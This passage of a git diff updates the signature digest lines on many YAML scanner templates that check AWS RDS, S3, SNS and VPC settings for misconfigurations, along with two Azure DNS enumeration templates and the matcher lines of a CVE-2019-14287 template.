4a0a0047304502200df47806e0ebcba6e0cbd3e933b7db44c7e85cb3e43bbb634ee48521d2c441e7022100b0694e5404356f0219d841a6ec17f3d756542a0c4137973b21d45dec07f12e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml index 15ef5f8b30..2cc98774d5 100644 --- a/cloud/aws/rds/aurora-copy-tags-snap.yaml +++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Copy Tags To Snapshot is not enable for cluster " + cluster' -# digest: 490a00463044022017828b27f24bd205df0e6c14c80b4cae52d2f6366dde8c60cc58302d7ca9c8ba022062233631583c3e674bb1daebdb9375c3501900fb1ba9ed7a06d972f8b7265b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc4ba9d64dbc0cb8bfebf677ff5b05c1eae8736bf8e64544dd8d0fc9b6daa762022100fd690deaf7ba10c756be945828cd76f7a03eb4442aeadf3c2cadf5bdb6f995c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml index 8927aab0c9..1dd4462220 100644 --- a/cloud/aws/rds/aurora-delete-protect.yaml +++ b/cloud/aws/rds/aurora-delete-protect.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Deletion Protection safety feature is not enabled for " + cluster' -# digest: 4b0a00483046022100c1c1ed75c7401266f13e1fc388a357df843c7994ab44ae8f501b14842ab7ec24022100b6c077b49006fb9ca13885abddf6be9c787d64eb415a13972e5fa3ea637792f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203957dae25c011794e69952e0a2122ce835294c72217b3dab63dfb30cec9fb36a02200bcd6f0ed9487a240393aebd0937196c729d98ecf8a3c86cb65a854534da925c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml index d556f68ca4..9acab1201f 100644 --- a/cloud/aws/rds/iam-db-auth.yaml +++ b/cloud/aws/rds/iam-db-auth.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Database Authentication feature is not enabled for RDS database instance " + db' -# digest: 4a0a00473045022100de421600413f2bb3306a9173334cd465c628dd5a198cec9ebe3bf5a373b4479602200bd9a29ac4bc3efe52763411a53243855f599f703baa22c7292da16898754f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c13b8d1e92988ff64fb71594f77d83105a2c8381fb5de3a284e41ee9b5c707940220585d60f323e31b9bc5ad2c72b045b1645c4a1546555f29c1ffb99936519dea83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml index 61da682f54..96616abe69 100644 --- a/cloud/aws/rds/rds-backup-enable.yaml +++ b/cloud/aws/rds/rds-backup-enable.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Automated backups are not enabled for " + db + " RDS database instance"' -# digest: 490a0046304402202cafc27efb26d112eaeeda54182636abc27e1c7d4c685250eee139e6016ad0e00220696ff967f5e74543e24b1f563a48870e20c7a651ebf098221cb3aa53d92d0a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100886ff717bb53ef7b235b73d9d22a861dee9a08a2c196289d611085a7e0418faa02200ad55fc97ce71f4828dc428a743be339174c1fdd6b0e68b4501e0ef6acf6b9de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml index 884e6d6060..0fc7269620 100644 --- a/cloud/aws/rds/rds-deletion-protection.yaml +++ b/cloud/aws/rds/rds-deletion-protection.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"RDS Deletion protection feature is not enabled for RDS database instance " + db' -# digest: 4b0a00483046022100914032dbc9479e0c23f03d553ff358b24dbb159d2b0e39591c929e1b7392f357022100dd0d109579a0dba307e0e203996af0754cc7d40cf1ef7adb218b01cba7fae2a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038daa8448190d837886c059bdc5c6ac4e48af03bf77572125c2465420d62224a02206ee2419a639762e33d52f890714e4e1dcb9aac3b10882d8accbdfc4e3324d67f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml index 51ed513f22..2193fd2490 100644 --- a/cloud/aws/rds/rds-encryption-check.yaml +++ b/cloud/aws/rds/rds-encryption-check.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"The encryption of data at rest is not enabled for " + db + " RDS database instance"' -# digest: 4a0a00473045022057333f0cba59e048aec18908bd8cbda6a4ab5398581190a3602a82d1f7f63f140221008c6002f40daa4eef203c0be542377e675dd0b28d3595fa4664449f30f13f325d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022013a493868c5989511d93d8702f49b30f995463ea94c0e0b9bfc859864b301cf3022100e40eecfced944d0776dcc8cc0f6b762902df7fcffc45e727b3a6a2b25630cf79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml index cd47b86696..cfe4b9f258 100644 --- a/cloud/aws/rds/rds-gp-ssd-usage.yaml +++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'db + " RDS instance uses Provisioned IOPS SSD, not the most cost-effective storage"' -# digest: 4a0a00473045022002f5c7fdd4d9d80a6820cfc1f222bfed3a1d9ad2e9f25cd1ef7757d60774a7dc022100c202e64f627d1aadd2a131aecdc048917a11798572597b382064897ed0848d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204abe02c1e1c465599d29b1e4d649d7076822a9529f8bd82e2005335f88b3e19402203cfedc9da10ff590c6b8dd01917ebce8b1c58c4c78f6af76e826b94d5aaa50e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml index dc477abaaa..e5a7aa9a50 100644 --- a/cloud/aws/rds/rds-public-snapshot.yaml +++ b/cloud/aws/rds/rds-public-snapshot.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"RDS snapshot " + snapshot + " is public"' -# digest: 4a0a0047304502210081a28e626fa15113ec4728cae1cd78218b292f7c71adc72cdb0b6d957475955302207063c6eda8c853ca2b1041f2751246979a75381a89e64b262b679667da1eb1eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220406064aac939d4deee904e965a39e74b5b6a866aa0120dc7a3ac03683a464fcb02204c1c229f967d74c64b9b3ebc03c6d31678f471305d10f708528996202549111f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml index ea9594ec42..7dbe3e5a5a 100644 --- a/cloud/aws/rds/rds-public-subnet.yaml +++ b/cloud/aws/rds/rds-public-subnet.yaml @@ -72,4 +72,4 @@ code: - type: dsl dsl: - 'db + " RDS instance is setup within a public subnet"' -# digest: 4b0a00483046022100d05dd8cfd16004c66141210fee94b5b5b1bdca54b4320091e86f7b7d018c336e022100fcf57d954bb32ef2d5eaf09ca000c729ef9d372ef651d5066f8d1a1e6aee8746:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e28cc0c54504b565396262e298134db5eda4e445c0dace7e8fea7908536db5a02207fe42a32f0d5dad744c51a08700afaad542699ee0d0e6edcef743ccf825ec3f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-ri-payment-fail.yaml b/cloud/aws/rds/rds-ri-payment-fail.yaml index 7a40b2f51c..2052d2b027 100644 --- a/cloud/aws/rds/rds-ri-payment-fail.yaml +++ b/cloud/aws/rds/rds-ri-payment-fail.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"RDS Reserved Instance purchase has failed for " + db' -# digest: 4a0a00473045022040705df585fbeec117d8605a7eb385b6fb0ae5cca87f948b79aef51f4a4b5b19022100a62f52ca4c10ab087a8d672d8288e120540531595b354c0663a7b5c7426ee198:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a87e8dbc52f8aa2867a09fe762c4eace58048fadd793ae073b556f4814e4e50022013d99683b2f38021dd6593524fc114936c990879b36fe374fde999d9a7764d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/rds/rds-snapshot-encryption.yaml b/cloud/aws/rds/rds-snapshot-encryption.yaml index 3ad25f6a8f..c26493e0bb 100644 --- a/cloud/aws/rds/rds-snapshot-encryption.yaml +++ b/cloud/aws/rds/rds-snapshot-encryption.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"Amazon RDS database snapshot " + snapshot + " is not encrypted"' -# digest: 490a0046304402207212f314b007f635435474f0ab2253e018047b2f878450e253223d5daa74da3f022064293bf9b3a736189797d2b46e1ad224dd05fa73dfe1ff2d0531a229ab2c89c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205835b9ea589fc13c9871eb2bb67185366bd4e82f24d8f172fd9f92ba53042e890220604cdbd900e33f44ad4e7dbf7b801719455093a3b1a326b0a06dd364ac6e9528:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-access-logging.yaml b/cloud/aws/s3/s3-access-logging.yaml index 0bf1a9c79f..b9f3e4b501 100644 --- a/cloud/aws/s3/s3-access-logging.yaml +++ b/cloud/aws/s3/s3-access-logging.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" does not have access logging enabled."' -# digest: 4b0a004830460221009c7c7b0d5efd419b91df9f3a9c18cbb5c3cf3e05586c1a2feaf8e1c1c1b5d5b5022100ac7392ba990a22432ad62945a93d61578dd95013697d6c3aefd30fa5e9decaac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fd29baed40f4c511911881ff79e5672f4533dfa6b19e717d05a961de2df470d502202eb21cdb29ae73b3bfbeabf3cb447bdfc777887e9e6a85b5cfe7edb82bba6e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-auth-fullcontrol.yaml b/cloud/aws/s3/s3-auth-fullcontrol.yaml index b234528c1f..4deaf6e445 100644 --- a/cloud/aws/s3/s3-auth-fullcontrol.yaml +++ b/cloud/aws/s3/s3-auth-fullcontrol.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"FULL_CONTROL is enabled for Authenticated Users on S3 Bucket " + bucket' -# digest: 4b0a00483046022100ae50a09843b165ba2fcd9f5fb5774c60c2ba2ca3ec8461b893c6eb47cce50cf8022100ab31d7ca772ca4fdce476fb02441aaae4130fe68605b346dd30bcaa9f2fb0c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022030e1999b1896b95b962ca877986fb0cf30c6804d6833dd62593a6f4e679759cc022100e43b6694c7aa13dff4686ad1d99e980cef361871b9267b06da36f2878c923a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml index b6e4a85e93..7431f79674 100644 --- a/cloud/aws/s3/s3-bucket-key.yaml +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"Key is not enabled for S3 Bucket " + bucket' -# digest: 490a0046304402207628f02f223a9c45013004373f631bfe358fe0898a91b4558b461cdbcb0cb33f02204c02ff4be552778912c6b81a4d7f06b0436bf0facd4066dd1b7b6a60c7fe8727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c522f260419eb69ca4b6a84f00cb91ab124c3bffc1e43e212b56ac15819dbce022100abbef96323f036a8483f553224f7a98cf8c6d5c863ac4faab4ef6b6e7831ab50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml index 9edb4e7d62..a594a87e58 100644 --- a/cloud/aws/s3/s3-bucket-policy-public-access.yaml +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -56,4 +56,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is publicly accessible via Policy"' -# digest: 4b0a004830460221009b48d546c9c75d61879e6371e646807f994d64408c3f84d48c9a9b344b9743410221009ed66db2acf2d13fb22b03344e70b7679191e4d76de5615fb69753c02d49306d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204fae5eb6e1f955f5a9d53c8f30d1d5fb8742e57e0c2ee96f342abbaa4e2c86fd022100dce6a398ef04206209cf3fc4714c9a933458aca9558d8387e8b42a0aabcc0c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml index 257ea66fa6..11a5a7fd29 100644 --- a/cloud/aws/s3/s3-mfa-delete-check.yaml +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not configured to use MFA Delete feature"' -# digest: 4a0a0047304502207b18bcd326a382b691f9645ba66223e79733146fbaaa7632197a652cb7319085022100d690b22a500eb8036ca670d596ead85d56ce5e576f1147e5e73430a5d49c3765:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206258e96a2294f4871ad68d7abdd1564bcb2de1c6696b48b399eb483f48b80f6102210083bc2afe82afaa0825a8360e89b22f988e7e989ac57c9f4a1d9f8169a5e6f0bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml index cc194ad440..f00ce621b2 100644 --- a/cloud/aws/s3/s3-public-read-acp.yaml +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -49,4 +49,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ_ACP access"' -# digest: 4b0a00483046022100ed3c7c8177b632e1968b920b9eef94ffdc0784d3b4cfef7073e31fa45879d929022100a4515cf3df6e19fdcc7f9c9460074d6310983bbdd4687e83cce86c290cb62c18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcbc17aee844273a0b66faf3957469462eec3e5869547d8652d739501fa028d2022070cd3aa2cf6fcd572dbe1e0e9b989cc1e3a3d25bbe5d7c3f1f45182d0a9047bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml index a8fa82cfc6..7eee586aa7 100644 --- a/cloud/aws/s3/s3-public-read.yaml +++ b/cloud/aws/s3/s3-public-read.yaml @@ -49,4 +49,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public READ access"' -# digest: 4a0a0047304502210096282cee509cda8603576b6bf36e9726a85cd0e5c7ffbf1a1b521840e04b9a0f022003295ca19e84cf783276bd6c7a2fa978a92543199f6da355ddfb130e465442da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0a9951cf1834f311dda7e8506d77563ca19b261254b07db518196933a224149022073682f61c196ae7d6f8f09f162fa702d05ee6f9e70b813d796517a318b6a3724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml index d41c09942e..c73cb5ecdc 100644 --- a/cloud/aws/s3/s3-public-write-acp.yaml +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE_ACP access"' -# digest: 490a004630440220164c9d55d2b50ac44caa26edd47e799e3ec62871676e74736d108a8541f0c2440220136ef5897894c74ad7fb3f936e269b6a777cc4e8f520c42142558990bea8eba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204de77d0507f74d782786aef08b62ecbcf9c82eea8522955eb98af9573cccdeb102206b485a9f8b358d4a10de5c2aa8f2c8a0592eb8a32a757b2cd49de953f7c58de5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml index ed2c3a6a19..d5b35c8fb7 100644 --- a/cloud/aws/s3/s3-public-write.yaml +++ b/cloud/aws/s3/s3-public-write.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" have public WRITE access"' -# digest: 490a004630440220795c3882ab9cb8a093b5e2e83c7822aaf15bfe4cff0426f3a6e5743196aa67730220375072f3c8dff6626dd361a31d12615188c7e8bd445e92f41fe755c323cefc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100845642c440c897503168e56980b76b3c167ec82fe1804b8302f0b8de3e0b2578022100f876c6d5ef3bb7c84e665b0c31fc7614bf7c9ec46b630fa6cb90f72e7f7f2d78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml index 114b86dd79..aaa9afa8e3 100644 --- a/cloud/aws/s3/s3-server-side-encryption.yaml +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -48,4 +48,4 @@ code: - type: dsl dsl: - '"The S3 bucket " + bucket +" is not encrypted at rest"' -# digest: 490a0046304402203e012cd857cace30b445932f893b9bd0f7bc709eec9f6cb5689fd30a520525e0022029cde524c58042593e654d36bfd7dcfb81b9508c534ec7750afe9ff96ad921d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b2f7ec06942729d8e4cd463ded9ad780f70660535ae12edcd5371d8c4726b213022100acc1da483bedd46efe1004ba122b638b7e429dcc291052bb7b784f139af5815d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml index d43ca32d56..fea988f68b 100644 --- a/cloud/aws/s3/s3-versioning.yaml +++ b/cloud/aws/s3/s3-versioning.yaml @@ -49,4 +49,4 @@ code: - type: dsl dsl: - '"Versioning is not enabled for S3 Bucket " + bucket' -# digest: 4b0a00483046022100ceb8b6be9871b6b9b57c5aa9add8902c3177845310afee02c6f8acc0cec48331022100fc98d53a049eaf0f8450f979233fffec17fd5c23d4c90fb78e68d8f05869f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220188c6eff76e5890e9487a7990ebc939706257a8d168f4e746b7a10b168f69882022100871f34e7125204a00ffb042ccaf984570af3f3a6a2c582613b4e8333a4f3ba87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml index 6427be550d..d24bceb2ef 100644 --- a/cloud/aws/sns/sns-topic-public-accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -61,4 +61,5 @@ code: extractors: - type: dsl dsl: - - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' \ No newline at end of file + - '"The SNS topic " + topicArn + " is publicly accessible via Policy"' +# digest: 4b0a00483046022100cbb02679b206daa0a1138c3c7d400ca3ccf3aea22840064633a6ac54fbe6a44d022100f23545b9fc5cdb35c1c853d68c2cb35904bd22385117daa75cf0923441d212d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index df1b38b564..381e02e4c4 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -61,4 +61,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a0047304502200de3239f933f1b468292a1ac4504bc398cad18ac3aa6f2de12357bd0e8a65759022100ee901336ec076eb9058f105f779e66be7bac556e1751713419df333cca4eaddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210090f1a4c3cf579052839a7c17926792dc80956b0a3ef6716f594d5dd3539e0e3f02205c9073431d5ad40af0eeb8a4ee457808e7ecac97f253ab129e5f27b78e4e9377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index 860dbd138c..660b35d5e6 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -61,4 +61,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a00473045022021e25dd23124572a8f6dbe6381024f3ecb8f78907d7ba0aafa2eb9c63990e140022100ba7669b283e58bf5b0fd08f3d5501d54221fc7a48b73b088c95330ea4c633f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024d4f02c513a648afb7661835f3744b1696e4866ac46f3be73f69d11264f6c69022100ce93ba9b7fb4b0e9f750ed04fbd68eb6df23e4979ecc05906bd8be9a19bd320e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 740e32638a..3af37ff600 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'vpc + " VPC is not using Managed NAT Gateways"' -# digest: 4b0a00483046022100f5f55c1da4e2aaca4b9547bf032c91c95a45a559e294e66e3a04343878e6416c022100919f04f7539cccd971883f2ac51a5a40f17c588dc2bb561902f5397715facf2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f15845608859adbcb7bc461874985337e016b6bcb1d26f443fd2a91ff851c9340220694f547d8ddea40af0456426f61944e9ca77f5cffbe76e991099683455728858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 9be1fe9293..58ac71ccd7 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -63,4 +63,4 @@ code: - type: dsl dsl: - '"Access to the VPC subnets associated with your NACL " + naclid + " is not restricted."' -# digest: 4a0a0047304502204e05c381a073d28047bdf9026597e5d331abca5011bbd8887ac323dd2b2983fb02210097ddd0dd706718f37b2c2f54820e543a9c6549883adc31296235e4b04fe04e97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028901135e75f8db19081e604cf1a970f707aba8ba33166b67eba938ebd823cf3022100d783804e924a32e191e35df29155fb31db60251900a5b60efe4aefceb91db299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index 73c01bc888..1daa0c01f7 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -61,4 +61,4 @@ code: - type: dsl dsl: - '"VPC endpoints for " + vpc + "are exposed."' -# digest: 4a0a004730450221009cd9ca7d1c7ce5d6db43cc95291be7e509c29f9ed1c7559ee1aeb31a6579920902206e30e36ec371d03d1c5d805d349458ee43fd27bd65917e4f33050e359de8ea3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200506111e97b28461eceb3c5334265051c3383b8a0eb553d5177f1c6344d933fb0220455e9ba374c56d762b53f3261e06eb79fca8809640330ecac13021f99a98aaed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index ca886cf418..5d0bf5282c 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - '"VPC Endpoints Not Deployed in the VPC network " + vpc' -# digest: 4a0a004730450220305c7cb9ef27a7249c71a3e30664db9f051b0f5438fe8ce42f2024ea91bfa24e022100e5b9e9b019adf2b1fcfd5121540efdbaf0c5fd39072523eacf41b5a50319666e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009cd67a7be189a4090753f24473354d6e9ea5260fefa513d791e762adabe13082022100d3ef3e2c090c022def55697e03a329df0cfb9ef0bba2b3a7e01e1438af444617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index f4343771a9..d32039e5c5 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -56,4 +56,4 @@ code: - type: dsl dsl: - '"Flow Logs feature is not enabled for the VPC " + vpc' -# digest: 4a0a00473045022016d83c316f318298be2c514542422c1a2f3a42517ac740d4b85ca980c9bf4676022100e7af7b416817f374b418962094ee777893f8fed6b17880fea736d1eb6caa38b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204d7a7d1871ae4512c2ddb09b3645f3c6198d9b1a2e3a23f9f6c4b64dd72f50270220375ec12b44621a7a765b301bf627747d6610602e3275091e81cabf53f0a65684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 83f8318d97..5e9567f98b 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -54,4 +54,4 @@ code: - type: dsl dsl: - 'vpnid + " VPN tunnel is down"' -# digest: 490a0046304402205ecec5a00e3d0521ad5a2e9ac0cebbe83e91d206c2233f683dcd750ff5b3841c02205528afb57d459d2c5075638280afcf53459f71aaeb2a5cabc21c41659d91f510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbcc51ec0d056e6f9a356238c660009c4b4fc8f3664e147b8c98c8a417631463022056928c4b49b652c38428461808244e27882fa7e30c7580d1d67511571d4b9c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 85240d75b9..edc8becfef 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -29,5 +29,4 @@ dns: part: answer words: - "IN\tA" - -# digest: 4a0a0047304502206a999e317308128dc9a9f3114f003b2c29cad9f569d6922502a8ac90971cf927022100c4fe9eea1496997e9ef66f8a46c2ece4bd511dede88aaf58d36410be3f2cc758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d82e21007ea9d2f9d609d5737dc4073c578f37b06b0023c12b39024ed7b63c302203b740c9bff84e6e2e21d0edf1cde2ed9dc4d878a5bf35e6080edfe32cb24fee0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index 20d09ff55a..562acae7b3 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -63,5 +63,4 @@ dns: part: answer words: - "IN\tA" - -# digest: 490a0046304402200614bd35195e042742d9840244b46d9f68e4918956d5672a7549edaedbfe5f2e022051271716ac72339c39f76569585c0a256b19ce6238da5e3ea6a9d36b2d80011e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210098b015215646fc57a33bf05ec1cd3363b21d9f635738f80193fab1edb1eb41c5022029c97c1df1d99734a1b67093023f2540fc877695c84573d61d3072c6167572ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 20e20ec8fa..edcebf7516 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -47,4 +47,4 @@ code: - '!contains(code_1_response, "root")' - 'contains(code_2_response, "root")' condition: and -# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 